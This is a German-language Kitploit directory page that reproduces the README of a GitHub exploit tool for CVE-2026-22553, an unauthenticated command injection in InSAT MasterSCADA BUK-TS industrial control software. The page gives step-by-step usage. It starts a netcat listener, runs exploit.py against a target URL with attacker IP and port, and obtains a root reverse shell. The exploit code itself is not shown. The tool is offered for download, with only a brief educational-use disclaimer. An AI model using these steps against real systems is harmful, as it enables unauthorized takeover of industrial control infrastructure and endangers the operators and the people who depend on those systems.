Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ — Nicht authentifizierter OS-Befehlseinschleusungs-Exploit für die InSAT MasterSCADA BUK-TS MMadmServ Web-Oberfläche. Liefert eine Reverse-Shell mit Root-Berechtigungen über eine HTTP-POST-Anfrage. CVSS 9.8 kritisch. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
Payload-GenerierungExploitationSCADA/ICS-SicherheitWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

Nicht authentifizierter OS-Befehlseinschleusungs-Exploit für die InSAT MasterSCADA BUK-TS MMadmServ Web-Oberfläche. Liefert eine Reverse-Shell mit Root-Berechtigungen über eine HTTP-POST-Anfrage. CVSS 9.8 kritisch.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
4vor 3 MonatenNoch nicht geprüft
Teilen

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - Nicht authentifizierte RCE

CVE-2026-22553 | CVSS 9.8 Kritisch | Exploit-Autor Mohammed Idrees Banyamer


📝 Beschreibung

InSAT MasterSCADA BUK-TS weist eine Nicht authentifizierte OS-Befehlseinschleusung im MMadmServ-Webinterface auf. Diese Sicherheitslücke ermöglicht es entfernten Angreifern, ohne Authentifizierung eine vollständige Remote-Codeausführung (RCE) zu erreichen.

  • Betroffenes Produkt: InSAT MasterSCADA BUK-TS (Alle Versionen)
  • Verwundbarkeitstyp: OS Command Injection (CWE-78)
  • Schweregrad: Kritisch (CVSS v3.1 Score: 9.8)
  • Exploit-Autor:
Mohammed Idrees Banyamer
  • Land: Jordanien 🇯🇴

  • 🛠️ Angriffsmethoden-Diagramm

    root@kitploit:~
    flowchart TD
        A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
        B -->|Unauthenticated| C[Vulnerable Parameter]
        C -->|OS Command Injection| D[Command Execution on Target Server]
        D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
        
        style A fill:#ff4d4d,stroke:#fff
        style E fill:#4dff88,stroke:#fff

    🚀 Verwendung

    root@kitploit:~
    python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
    

    Beispiel

    root@kitploit:~
    python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
    

    Optionen

    OptionBeschreibung
    targetZiel-URL (z.B. http://ip:port)
    --lhostIhre IP-Adresse (Reverse Shell)
    --lportIhr Listening-Port

    📌 Anleitung

    1. Starten Sie einen Listener auf Ihrem Rechner:

      root@kitploit:~
      nc -lvnp 4444
      
    2. Führen Sie den Exploit aus:

      root@kitploit:~
      python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
      
    3. Erhalten Sie eine Reverse-Shell mit root/system-Rechten.


    ⚠️ Haftungsausschluss

    Dieser Exploit wird ausschließlich zu Bildungs- und autorisierten Penetrationstest-Zwecken bereitgestellt.
    Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören, ist illegal und kann gegen internationale Gesetze verstoßen.
    Der Autor übernimmt keine Verantwortung für Missbrauch.


    📬 Autor

    Mohammed Idrees Banyamer

    • Instagram: @banyamer_security
    • GitHub: mbanyamer
    • Land: Jordanien 🇯🇴

    Star ⭐ dieses Repository, wenn Sie es nützlich fanden!

    Tool herunterladen